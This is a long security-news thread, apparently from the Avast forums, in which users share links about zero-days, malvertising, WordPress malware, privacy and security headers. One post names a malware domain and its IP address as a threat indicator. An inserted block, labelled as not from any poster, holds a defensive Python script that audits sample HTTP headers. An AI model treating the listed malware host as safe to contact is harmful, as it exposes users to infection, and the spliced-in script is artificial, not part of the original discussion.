What they are against, and I think always was in the facebook terms, is that all you post there becomes owned by facebook.
Names, content and profile photos can be so used by facebook. Photos and videos could even be sold to a third party, even under the new rules.
The trend to leave facebook seems global according to this survey: http://blog.globalwebindex.net/facebook-teens-decline
This is why a lot of users will leave as these new rules come into play on January 1st.
Well, it is like going to a public place with thin cardboard walls, there is no privacy left.
"A service of many an undesired possibility", but didn't they know that all along and a long time ago?
But another new trend now is that you can go to a fast-food place nearby
to get your online film present along with your salad menu order.
Another reason for tension between the ad-marketing industry and the content industry, I assume.
polonus
-
I'm sure that this social networking content ownership thing has reared its head years ago (once uploaded, passed to the service provider).
Now I don't know if at that point facebook was in the frame or not - but the idea of ownership was certainly known about. But most people don't bother reading the small print of the T&Cs.
-
Hi DavidR,
The only right/guarantee you have is that that free service is being terminated or the availability of the content you provided is discontinued at any time the service provider sees fit, because you don't own that platform. It can be sold or can go broke.
Same here on the avast forums - you can only hope avast continues their free service and also protects our content, as they have no obligation to do. So we could and also should be very grateful. Also you cannot provide content on behalf of others, just like you cannot give your neighbour's dog away. So the content may be yours (whenever it does not infringe copyright when shown), but the availability thereof online is completely out of your hands.
polonus
-
FBI Warns U.S. Businesses to Be on Guard Against Iran Hack Attacks
http://www.nbcnews.com/tech/security/fbi-warns-u-s-businesses-be-guard-against-iran-hack-n267561
-> https://forum.avast.com/index.php?topic=66267.msg1159107#msg1159107
-
FBI Warns U.S. Businesses to Be on Guard Against Iran Hack Attacks
http://www.nbcnews.com/tech/security/fbi-warns-u-s-businesses-be-guard-against-iran-hack-n267561
-> https://forum.avast.com/index.php?topic=66267.msg1159107#msg1159107
False flag. Demonization of Iran,Russia and China continues.I don't trust western mass media.
-
As bob3160 always says and he has some very good and sound points always,
is to better refrain from a couple of topics to keep the discussion here nice and cultural.
So no politics and religion. A question of mutual respect.
Such topics should stay a big no no, not only when you dine out with your boss, but also in a public forum.
polonus
-
SoakSoak dot ru Malware Compromises 100.000 WP sites! (registered in the States)
Read: http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Complaints on WP forum: https://wordpress.org/support/topic/all-my-sites-6-hacked-with-soaksoakru
Webmasters should install Wordfence and scan to find the malcode issue.
See the VirusTracker result: soak.soak dot ru,72.52.4.119,ns2.sedoparking dot com,Criminals,
(meaning up and active malware there)
IP with a Sality3 variant that avast detects as Win32:Kukacka.
polonus
-
So no politics and religion. A question of mutual respect.
Such topics should stay a big no no, not only when you dine out with your boss, but also in a public forum.
+1 Nothing more to add, thanks Pol.
-
ICANN Targeted in Spear Phishing Attack | Enhanced Security Measures Implemented
https://www.icann.org/news/announcement-2-2014-12-16-en
-
Cellphones insecure by default: http://www.washingtonpost.com/blogs/the-switch/wp/2014/12/18/german-researchers-discover-a-flaw-that-could-let-anyone-listen-to-your-cell-calls-and-read-your-texts/
polonus
-
More to the so-called Sony Hack as assumed at first sight - sloppy error-ridden malcode used,
-> http://arstechnica.com/security/2014/12/state-sponsored-or-not-sony-pictures-malware-bomb-used-slapdash-code/
read: http://techcrunch.com/2014/12/17/sony-pictures-employees-now-working-in-an-office-from-ten-years-ago/
polonus
-
More to the so-called Sony Hack as assumed at first sight - sloppy error-ridden malcode used,
-> http://arstechnica.com/security/2014/12/state-sponsored-or-not-sony-pictures-malware-bomb-used-slapdash-code/
read: http://techcrunch.com/2014/12/17/sony-pictures-employees-now-working-in-an-office-from-ten-years-ago/
polonus
Two wrongs never make one right. The movie never should have been made and neither should the hack. IMHO :)
-
12 million routers now cookie-holed: http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/
and http://www.checkpoint.com/press/2014/media-alert-check-point-researchers-discover-significant-vulnerability-used-take-control-millions-consumer-business-internet-routers/
polonus
-
Hacker hijacks unlocked machines through usb=device: https://github.com/samyk/usbdriveby
polonus
-
Google "Goliath" versus the Content Industry news leaked out via Sony Hack: http://www.theverge.com/2014/12/12/7382287/project-goliath
polonus
-
Certain parties will try to disable the Tor Network within a couple of days by taking down the "directory authorities".
Tor users will be warned when the network will be incapacitated.
Who the alleged attackers are is not known so far.
https://blog.torproject.org/blog/possible-upcoming-attempts-disable-tor-network
It is rumored however that Tor will be brought down over the weekend
and a swoop could be related to the US government's investigation into the Sony Pictures mega-hack
or that this might be used as a pretext to take it down.
polonus
P.S. We will see things like this: ERROR: Gateway Timeout
While trying to retrieve the URL http://128.31.0.39/:
No route to host
Your cache administrator is webmaster.
Generated Sat, 20 Dec 2014 14:25:53 GMT by ::ffff:192.168.177.1 (Mikrotik HttpProxy)
Read: https://news.ycombinator.com/item?id=8774833
-
It's The Season:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1419092790804-68886.png)
-
NTP versions not stable, not completely tested and with issues and now also found to be exploitable.
Verdict: stop using it: https://blog.hboeck.de/archives/863-Dont-update-NTP-stop-using-it.html
Instead use: http://chrony.tuxfamily.org/
polonus
-
Staples Provides Update on Data Security Incident
http://staples.newshq.businesswire.com/statement
-
As predicted in an earlier post in this thread: http://www.theregister.co.uk/2014/12/22/stay_away_popular_tor_exit_relays_look_raided/
Previous warning from admin: http://article.gmane.org/gmane.network.tor.user/34619
Servers have been blacklisted and pose no danger now to Tor users.
polonus
-
Google Safebrowsing blocked 39.000 infested WP-sites: http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Check your site with: https://wordpress.org/plugins/sucuri-scanner/
Lots of sites became infested because the vulnerable plug-in software did not have the latest patches.
polonus
-
Windows: Elevation of Privilege in ahcache.sys/NtApphelpCacheControl
https://code.google.com/p/google-security-research/issues/detail?id=118
-
75% of PHP installations unsafe: http://blog.ircmaxell.com/2014/12/php-install-statistics.html
blog link author = Anthony Ferrara
Remember there is nothing wrong with PHP, but there is so much more wrong with PHP programming.
In combination with an outdated CMS and in the hands of/advised by people with no insight, a very, very dangerous code-brew however ;D
For checking info see these resources: http://php.net/manual/en/function.phpinfo.php :o
Check version number with exploit and you have a beginner's attack formula.
So PHP and server version number info proliferation is still a big problem.
polonus
-
GoGO in-flight WiFi uses a false Google certificate to filter streaming video -> http://www.theregister.co.uk/2015/01/06/gogo_ssl/
At least where net equality is concerned we know where these guys stand in that discussion - the privileged and those that can pay will have the fast lane, the others are forced down the slow lane and they force it in by all means.
polonus
-
I'm probably not posting this on the right forum, and I don't know if this is a problem with my Avast software or my other anti-virus program (AdvancedSystemCare by IObit) but--- I keep getting this message window that says - SearchProtection.exe - Fatal Application Exit Unhandled exception. It then has a ExpCode number, ExpFlag, and Exp address. The window says I should report it immediately.
What do I do?
-
I'm probably not posting this on the right forum, and I don't know if this is a problem with my Avast software or my other anti-virus program (AdvancedSystemCare by IObit) but--- I keep getting this message window that says - SearchProtection.exe - Fatal Application Exit Unhandled exception. It then has a ExpCode number, ExpFlag, and Exp address. The window says I should report it immediately.
What do I do?
You're right - this topic isn't correct, this is for security based announcements.
You can start a new topic in the Viruses & Worms sub-forum https://forum.avast.com/index.php?board=4.0. This however may not be necessary as I believe the crux of the matter is your comment "my other anti-virus program": having multiple AVs installed is asking for conflict issues as both dogs fight over one bone.
So I would suggest that you uninstall "AdvancedSystemCare by IObit" - you might also do a search for IObit in the forums as there are some disturbing reports.
-
In the news – Managed internet devices and biometry
http://blogs.norman.com/2015/business/managed-internet-devices-biometry
Biometric access control has gained popularity with mobile phones in recent years. We have seen it used in movies for years, where iris- and fingerprint scanners have been portrayed as a fool-proof way of identifying users. There are two problems with this:
– The methods are not fool-proof, as demonstrated at the CCC conference.
– Your biometric information cannot be changed. Once copied by a perpetrator, a person cannot use it for identification anymore.
-
AOL halts malicious ads served by its advertising platform (http://www.pcworld.com/article/2866192/aol-halts-malicious-ads-served-by-its-advertising-platform.html)
Guess that's why they call it AOhelL :)
-
Before you enable those macros…
http://blogs.technet.com/b/mmpc/archive/2015/01/02/before-you-enable-those-macros.aspx
-
Microsoft's Skype victim of malvertisers: http://community.skype.com/t5/Windows-desktop-client/Skype-serving-virus-laden-ads/td-p/3818431
Now I am glad bob3160 taught me how to block ads inside Skype.
It now also blocks malvertisements.
polonus
-
Revolving satirical security news ;D - refresh the page and get a new "who's done it": http://sony.attributed.to/
polonus
-
Revolving satirical security news ;D - refresh the page and get a new "who's done it": http://sony.attributed.to/
polonus
Happy to help :)
It also saves me even though right now I'm still using the paid version. The changes will come in handy when the Pro version
trial ends and I go back to the free version.
-
Hi guys, some bad news. :(
Evolving Microsoft's Advance Notification Service in 2015
http://blogs.technet.com/b/msrc/archive/2015/01/08/evolving-advance-notification-service-ans-in-2015.aspx
We are making changes to how we distribute ANS to customers. Moving forward, we will provide ANS information directly to Premier customers and current organizations involved in our security programs, and will no longer make this information broadly available through a blog post and web page.
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1420898242636-59821.png)
(From my current presentation)
-
This isn't a security warning or notice as such:
Cybercrime Stories: Sandra
http://us.norton.com/cybercrime-stories-sandra/article
But it is a strong word of caution on how what we do and click on, and where we go, whilst on the Internet, may have disastrous consequences in our personal lives. Know your enemy and how they operate.
-
Hacking for a good cause:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1421078864897-98015.png)
Anonymous hits the first target of ‘Operation Charlie Hebdo’ (http://www.neowin.net/news/anonymous-hits-the-first-target-of-operation-charlie-hebdo)
-
Windows Elevation of Privilege in User Profile Service
https://code.google.com/p/google-security-research/issues/detail?id=123
-
Epic Fail and Imago Damage: http://www.washingtonpost.com/news/checkpoint/wp/2015/01/12/centcom-twitter-account-apparently-hacked-by-islamic-state-sympathizers/
polonus
-
Corel Software DLL Hijacking
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
-
Malvertisers abuse AdSense through Malvertising Campaign: http://blog.sucuri.net/2015/01/adsense-abused-with-malvertising-campaign.html (link article author = Sucuri's Denis Sinegubko.)
polonus
-
Hacked WiFi Routers Causing Latest Lizard Squad Attacks.
http://www.techweekeurope.co.uk/networks/lizard-squad-home-routers-ddos-159281#F1HzVpohhU2rk2Ts.99
edit: avast CTO, Ondrej Vlcek, comments.
-
New report: DHS is a mess of cybersecurity incompetence
http://www.zdnet.com/article/new-report-the-dhs-is-a-mess-of-cybersecurity-incompetence/
Department of Homeland Security=DHS
-
Windows: Impersonation Check Bypass With CryptProtectMemory and CRYPTPROTECTMEMORY_SAME_LOGON flag
https://code.google.com/p/google-security-research/issues/detail?id=128
-
No link but...evidently there are some rogue companies running a scam by posing as "official"
avast third party support. Using the third party support is a bad idea to begin with but to "fake"
users into believing them to be legit is even worse. The forums are the best place to start, our help is free.
This is something I read on Google+.
-
Verizon injects zombie cookie headers in cooperation with Turn.
What can we do against zombiecookies: https://www.eff.org/deeplinks/2015/01/which-apps-and-browsers-protect-you-against-verizon-and-turns-non-consensual (article author = Peter Eckersley)
polonus
-
Crapware now that can only be cleansed by a complete uninstall and reinstall of Google Chrome:
2 examples: 1. https://forum.avast.com/index.php?topic=164653.msg1173888#msg1173888
and
2. https://forum.avast.com/index.php?topic=164635.msg1173727#msg1173727
(credits for this cleansing method should go to Sam Yrlund on Google Discussion Groups).
Our qualified removal expert, essexboy, gives the following explanation:
What it is, is a change to a legitimate Firefox (or in your case Chrome) file that prevents the extensions being removed
polonus
-
This Polar SSL Security Vulnerability should be patched : https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2014-04
Do not know of any consequences for avast VPN?
polonus
-
Well
7 Out Of 8 Free Antivirus Programs Come Bundled With PUPs!
http://blog.emsisoft.com/2015/01/17/has-the-antivirus-industry-gone-mad/?ref=ticker150119&utm_source=newsletter&utm_medium=newsletter&utm_content=blog&utm_campaign=ticker150119
-
The NSA not only creates, but also hijacks, malware with Quantumbot
http://www.computerworld.com/article/2871687/the-nsa-not-only-creates-but-also-hijacks-malware-with-quantumbot.html
-
Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK
http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
New Flash 0-day - blocked by MBAE
https://forums.malwarebytes.org/index.php?/topic/163793-new-flash-0-day-blocked-by-mbae/
-
An overwhelming majority of websites have less optimal or rather bad server security header implementation.
Headers may be missing, wrongly implemented or not following best practices.
I arrived at these conclusions from my continuous website scans, mainly reported in the virus and worms section of the forums.
Just scan with scanners here: http://cyh.herokuapp.com/cyh (scan with eventual recommendations)
or here (beta-scan): https://securityheaders.com/test-http-headers.php
For ASP.NET Websites use the Automated Security Analyser for ASP.NET Websites: https://asafaweb.com/
Main prevailing issues are excessive header info proliferation, HttpOnly cookie warnings, and clickjacking warnings.
Also a lot of sites with custom-errors FAIL.
For Google chrome there is an extension from: https://www.recx.co.uk/ to give additional information.
Recx Security Analyser v.1.3.0.4.
When implementations are missing, wrong or not following best practices it is much easier for attackers to abuse websites.
Webmasters and hosting parties alike should pay more attention to these issues, so visitors of websites will be better protected.
To start with this, read here: https://xato.net/secure-coding/security-headers/
also: https://www.owasp.org/index.php/List_of_useful_HTTP_headers#Check_Your_Headers
also: https://www.veracode.com/blog/2014/03/guidelines-for-setting-security-headers
polonus (volunteer website security analyst and website error-hunter)
-
Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK
http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
New Flash 0-day - blocked by MBAE
https://forums.malwarebytes.org/index.php?/topic/163793-new-flash-0-day-blocked-by-mbae/
Is Avast going to do something to protect us before Flash Player update ?
It is not big problem for me since I keep all plugins disabled and use them when needed.
-
One of the big experts on website malware, REDLEG, lists malware threats of the day:
http://aw-snap.info/articles/malware-of-the-day.php
Redleg's file viewer is a renowned tool to analyze the code on one's website for threats and issues:
http://aw-snap.info/file-viewer/
Here Regleg is also very active helping the website security community: https://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
polonus (volunteer website security analyst and website error-hunter)
-
New "Flash = Trash" Zero-Day actively being abused: http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html (article author = Kafeine)
polonus
-
Chrome as yet does not support X-Frame-Options: Allow-From [uri]
: https://bugs.webkit.org/show_bug.cgi?id=94836
So chrome is defenseless against clickjacking :o (Has basic support - ALLOW-FROM support = Not supported)
Who can confirm this is the actual situation for the chrome browser?
Best practices: http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx
polonus
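Added example, not code from any poster in this thread: a small Python checker for the response-header problems raised in the security-headers post above (missing headers, HttpOnly cookie warnings, clickjacking protection), the X-Frame-Options ALLOW-FROM point in this post, and the earlier remark about PHP/server version numbers leaking in headers. It audits a constructed sample header block offline (the weak and the hardened variants below are made up for illustration, not captured from any real site) and returns a list of findings a webmaster could act on.

```python
import re
from typing import List, Tuple

# Constructed sample responses (illustrative only, not from any real server).
WEAK_HEADERS = """HTTP/1.1 200 OK
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=abc123; path=/
X-Frame-Options: ALLOW-FROM https://partner.example
"""

HARDENED_HEADERS = """HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly; Secure
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
"""

VERSION_RE = re.compile(r"\d+\.\d+")  # crude "looks like a version number" check


def parse_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP response head into (status line, [(name, value), ...]).
    Header names are lower-cased; repeated headers (e.g. Set-Cookie) are kept."""
    lines = raw.strip().splitlines()
    status = lines[0]
    headers = []
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def audit_headers(raw: str, https: bool = True) -> List[str]:
    """Return human-readable findings for the header block; empty list = clean."""
    _, headers = parse_headers(raw)
    names = {n for n, _ in headers}

    def get(name: str) -> List[str]:
        return [v for k, v in headers if k == name]

    findings: List[str] = []

    # 1. Version proliferation: Server / X-Powered-By revealing exact versions.
    for h in ("server", "x-powered-by", "x-aspnet-version"):
        for v in get(h):
            if VERSION_RE.search(v):
                findings.append(f"{h}: discloses version ({v})")

    # 2. Clickjacking: need X-Frame-Options or CSP frame-ancestors.
    xfo = get("x-frame-options")
    csp = get("content-security-policy")
    has_frame_ancestors = any("frame-ancestors" in v for v in csp)
    if not xfo and not has_frame_ancestors:
        findings.append("clickjacking: no X-Frame-Options or CSP frame-ancestors")
    for v in xfo:
        # ALLOW-FROM is not honoured by every browser (the post above notes
        # Chrome lacks it), so rely on CSP frame-ancestors alongside it.
        if v.upper().startswith("ALLOW-FROM") and not has_frame_ancestors:
            findings.append("clickjacking: X-Frame-Options ALLOW-FROM is not "
                            "supported by all browsers; add CSP frame-ancestors")

    # 3. MIME sniffing protection.
    if "x-content-type-options" not in names:
        findings.append("missing X-Content-Type-Options: nosniff")

    # 4. HSTS only makes sense for HTTPS sites.
    if https and "strict-transport-security" not in names:
        findings.append("missing Strict-Transport-Security")

    # 5. Cookie flags: HttpOnly (script access) and Secure (HTTPS only).
    for v in get("set-cookie"):
        cookie_name = v.split("=", 1)[0]
        attrs = {a.strip().lower() for a in v.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name}: missing HttpOnly")
        if https and "secure" not in attrs:
            findings.append(f"cookie {cookie_name}: missing Secure")

    return findings


if __name__ == "__main__":
    for label, block in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(f"== {label} ==")
        for f in audit_headers(block) or ["no findings"]:
            print(" -", f)
```

To run it against a live site you own, feed the raw response head (for instance the output of a `curl -sI` call) into `audit_headers`; the parser only needs the status line followed by `Name: value` lines.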
-
Account Stealing Wallpaper App found in Google Play Store
https://blog.malwarebytes.org/mobile-2/2015/01/account-stealing-wallpaper-app-found-in-google-play-store/?utm_source=Gplus&utm_medium=social
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1422133007522-6407.png)
Another Good source for freeware now in bad hands. (http://www.davescomputertips.com/rip-freewarebb/)
-
Security Advisory – Vulnerabilities in Pagelines/Platform theme for WordPress
http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html
-
Facebook is not fond of watermarking your images on facebook.
The Dutch app Reclaim has been offline now for a week and it is not known why this happened.
This app to protect your photos through watermarking is apparently still in use: http://www.dmca.com/facebook.aspx
Watermarking images may conflict with the new terms and conditions from facebook-> http://www.telegraph.co.uk/technology/social-media/9780565/Facebook-terms-and-conditions-why-you-dont-own-your-online-life.html
(new terms and conditions come into effect Jan. 30th this year)
Anyone to react?
polonus
-
Beware The Dreaded Trojan JS:Agent-DIE [Trj]
http://www.skyvalleychronicle.com/BREAKING-NEWS/BEWARE-THE-DREADED-TROJAN-BR-Trojan-JS-Agent-DIE-Trj-1999393
-
Sites may detect the local IP address in browsers supporting WebRTC
http://www.ghacks.net/2015/01/27/sites-may-detect-the-local-ip-address-in-browsers-supporting-webrtc/
Button to activate/deactivate WebRTC in Firefox :
https://addons.mozilla.org/en-US/firefox/addon/webrtc-button/?src=ss
-
IE11 data
-
Sites may detect the local IP address in browsers supporting WebRTC
Quote from the article: The only extensions that block these look ups are JavaScript blocking extensions such as NoScript for Firefox.
-
Malvertiser activity on XHAMSTER site: https://blog.malwarebytes.org/exploits-2/2015/01/top-adult-site-xhamster-involved-in-large-malvertising-campaign/
polonus
-
Flash is actively being attacked, the so-called Angler attack,
so check your Flash version here to make sure you are not vulnerable:
http://www.adobe.com/software/flash/about/
polonus
-
This is probably the reason why Google is officially changing to HTML5 for YouTube. :)
-
Not sure if this is the right place so no flaming please. As to Avast it nagged me into upgrading my "outdated software" so I updated Java 7 to Java 8. After this had been done I discovered that I was locked-out of a website that sells marine equipment.
Next I went to Control Panel and uninstalled Java 8. After that it was Rollback my computer to an earlier date. That worked OK but I just don't need all this hassle. As the old saying goes "If it aint broke don't fix it."
-
Hi david.benyon,
Well, Java creating some problems, just an ordinary thing.
So avoid where you can do without.
To-day I had to survey at a java developer's exam treating a foo example.
You know what foo meant originally?
The term derived from a combination of the f-word (yes, that 5 letter term) and oo coming from up,
to describe how you felt apparently.... ;) some add BAR meaning Beyond Any Recognition - so FUBAR....
Actually it is a term to denote anything in code, so just a name for some code example, the type name of a "class".
So if Java foo-ed you, it is no big surprise for me.
Outdated Java is a remarkable security risk as all zero-days go.
polonus (volunteer website security analyst and website error-hunter)
-
This is probably the reason why Google is officially changing to HTML5 for YouTube. :)
I think they did a while ago, since I could watch youtube videos with Flash disabled.
-
This is probably the reason why Google is officially changing to HTML5 for YouTube. :)
I think they did a while ago, since I could watch youtube videos with Flash disabled.
Adopting HTML5 as the default is a recent decision. More information at:
YouTube drops Flash for HTML5 video as default | The Verge http://www.theverge.com/2015/1/27/7926001/youtube-drops-flash-for-html5-video-default
-
CANADA CASTS GLOBAL SURVEILLANCE DRAGNET OVER FILE DOWNLOADS:
https://firstlook.org/theintercept/2015/01/28/canada-cse-levitation-mass-surveillance/
Link article authors: RYAN GALLAGHER AND GLENN GREENWALD.
polonus
-
Market Share Report
https://www.opswat.com/resources/reports/antivirus-and-compromised-device-january-2015#antivirus-vendor-market-share
Keeping A Secure Mobile Device
https://blog.malwarebytes.org/mobile-2/2015/01/keeping-a-secure-mobile-device/?utm_source=Gplus&utm_medium=social
-
Check this out: http://www.crimeflare.com/ and see: http://www.crimeflare.com/cfsites.html
polonus
-
Top result on Google for the phrase "avast online scan" shows this site:
http://www.getavast.net/support/online-scanner (http://www.getavast.net/support/online-scanner)
Everything there screams SCAM to me.
Especially if you scroll to the bottom where they write:
"Please note we are not an official AVAST website – that you can find at www.avast.com."
Funny thing is, the link for "www.avast.com" leads to "http://send.onenetworkdirect.net/z/25497/CD185233/"
-
Malware hides via Microsoft's Downloadservice BITS: http://community.websense.com/blogs/securitylabs/archive/2015/01/29/new-f0xy-malware-employs-cunning-stealth-amp-trickery.aspx
polonus
-
The Password And You
https://blog.malwarebytes.org/online-security/2015/01/the-password-and-you/?utm_source=Gplus&utm_medium=social
-
@SnowmanDK,
Site has a Moderate Risk status at BrightCloud, rep index yellow 60.
Not flagged here: http://www.scamvoid.com/check/getavast.net
The registrant is Petr Novak -> http://whois.domaintools.com/getavast.net Head of ICT at LMC s.r.o.
Interest in Avast for Mac: http://macforum.cz/viewtopic.php?f=1&t=833
See: https://plus.google.com/117953609589883546929/posts/aTMxPnVjVm2
See: http://www.dnsinspect.com/scamvoid.com/1422715097
hostname: p3nlhg340c1340.shr.prod.phx3.secureserver.net
External link to: https://www.virustotal.com/nl/domain/vassg141.ocsp.omniroot.com/information/
Vuln.: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.getavast.net%2Fxmlrpc.php
Script there found to be benign: http://jsunpack.jeek.org/?report=a97329c7fb69672803283a0bee6679a1718e82af
An avast-fan site, not affiliated with avast but not a rogue site either.
Site security OK: http://sitecheck.sucuri.net/results/www.getavast.net
polonus (volunteer website security analyst and website error-hunter)
-
The Pirate Bay Is Back Online!
http://torrentfreak.com/pirate-bay-back-online-150131/
https://thepiratebay.se/
-
Hi abruptum,
Now hosted in the U.S. of A. by Cloudflare: http://toolbar.netcraft.com/site_report?url=https://thepiratebay.se/
SOA issues: http://dnscheck.pingdom.com/?domain=thepiratebay.se&timestamp=1422751579&view=1
pol
-
Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
-
Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
Again. :o
This is not funny anymore.
-
Protection via extension against WebRTC leaking VPN IP addresses: WebRTC block.
https://chrome.google.com/webstore/detail/webrtc-block/nphkkbaidamjmhfanlpblblcadhfbkdm?hl=en
polonus
-
Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
Again. :o
This is not funny anymore.
Never was.
If running Firefox, click Menu (three bars upper right) > Addons > Plugins > Adobe Flash (Shockwave Flash 16.0.0.296) or other flash and select 'Ask to activate' so you can control when it runs. One of the many reasons YouTube is now running HTML5 instead of flash. Google Chrome: https://support.google.com/chrome/answer/108086?hl=en
-
Google Chrome update Spam drops CTB Locker/Critroni Ransomware
https://blog.malwarebytes.org/social-engineering/2015/02/google-chrome-update-spam-drops-ctb-lockercritroni-ransomware/?utm_source=Gplus&utm_medium=social
Money Mule Scam Siphons $214Mn Worldwide
http://www.infosecurity-magazine.com/news/money-mule-scam-siphons-214mn/
-
Major Internet Explorer Vulnerability - NOT Patched
http://seclists.org/fulldisclosure/2015/Feb/0
-
Major Internet Explorer Vulnerability - NOT Patched
http://seclists.org/fulldisclosure/2015/Feb/0
Pretty vague since it doesn't state if this is a vulnerability in a specific version or all versions of IE.
-
We live in the Golden Age for Total Surveillance: http://www.theguardian.com/technology/2015/feb/02/pgp-phil-zimmermann-intelligence-agencies-encryption link article author Stuart Dredge
polonus
-
We live in the Golden Age for Total Surveillance: http://www.theguardian.com/technology/2015/feb/02/pgp-phil-zimmermann-intelligence-agencies-encryption link article author Stuart Dredge
polonus
This shouldn't come as a surprise to anyone who has followed this forum for any length of time. :)
"There is no such thing as privacy" :)
-
WinXP market share is going up again?
http://www.netmarketshare.com/report.aspx?qprid=11&qpaf=&qpcustom=Windows+XP&qpcustomb=0
http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
-
WinXP market share is going up again?
http://www.netmarketshare.com/report.aspx?qprid=11&qpaf=&qpcustom=Windows+XP&qpcustomb=0
http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Interestingly still higher than win8/8.1 combined. MS is really having a hard time with that dog - It will probably drop much lower when they start giving away win 10 to certain qualifying win7 and win8/8.1 systems.
-
Yes, DavidR, and there are some continents or part of continents, where MS should start spreading the Win10 promotion.
I would start in the land of the Middle Kingdom - 中國/中国 - 中華/中华 .
And I know some more nations where the prevalence of XP is still very substantial.
This could get us better global security.
polonus
-
HanJuan EK fires third Flash Player 0day
https://blog.malwarebytes.org/exploits-2/2015/02/hanjuan-ek-fires-third-flash-player-0day/?utm_source=Gplus&utm_medium=social
-
Read, as this link should work: http://arstechnica.com/security/2015/02/serious-bug-in-fully-patched-internet-explorer-puts-user-credentials-at-risk/
IE11 zero-day triggered by going to maliciously crafted pages; use Firefox or Google Chrome until MS patches this bug/hole.
polonus
-
Just added to my presentation: Security Is Everyone's Business (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing)
-
Logging In and Captcha
https://blog.malwarebytes.org/online-security/2015/02/logging-in-and-captcha/?utm_source=Gplus&utm_medium=social
-
Zero-day in the Fancybox-for-WordPress Plugin
http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html
-
Zero-day in WP CMS - update now: http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.htm
and https://wordpress.org/support/topic/possible-malware-2
polonus
-
Malvertising campaign already going on for months: http://www.invincea.com/2015/02/fessleak-the-zero-day-driven-advanced-ransomware-malvertising-campaign/
pol
-
Gamers Targeted with Fake In-Game Comms Apps
https://blog.malwarebytes.org/fraud-scam/2015/02/gamers-targeted-with-fake-in-game-comms-apps/?utm_source=Gplus&utm_medium=social
The Facts about Botnets
https://blog.malwarebytes.org/cyber-crime/2015/02/the-facts-about-botnets/?utm_source=Gplus&utm_medium=social
-
EU-parliament blocks new MS Outlook apps for EU parliament members.
https://blog.winkelmeyer.com/2015/01/warning-microsofts-outlook-app-for-ios-breaks-your-company-security/
Because the apps will store your credentials on USA cloud servers, which some may consider an insecurity.
polonus
-
Is your smart TV too smart?
YOUR SAMSUNG SMARTTV IS SPYING ON YOU
http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html
-
Pawn Storm Update: iOS Espionage App Found
http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/
-
Is your smart TV too smart?
YOUR SAMSUNG SMARTTV IS SPYING ON YOU
http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html
UPDATE 2/6/15 1:59 PM: "Samsung takes consumer privacy very seriously.
In all of our Smart TVs we employ industry-standard security safeguards and practices, including data encryption,
to secure consumers’ personal information and prevent unauthorized collection or use," the company said in a statement
to The Daily Beast. "Voice recognition, which allows the user to control the TV using voice commands, is a Samsung
Smart TV feature, which can be activated or deactivated by the user. The TV owner can also disconnect the TV from the Wi-Fi network."
The same thing can be said for almost any voice command operations.
-
Is your smart TV too smart?
YOUR SAMSUNG SMARTTV IS SPYING ON YOU
http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html
An Update:
Your Samsung SmartTV isn’t spying on you! (http://www.slashgear.com/your-samsung-smarttv-isnt-spying-on-you-09368124/)
-
Just added to my latest Presentation (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing):
It didn't take them long to jump on the email scamming trail. Be Careful!
-
Microsoft Security Bulletin Summary for February 2015
https://technet.microsoft.com/en-us/library/security/ms15-feb
-
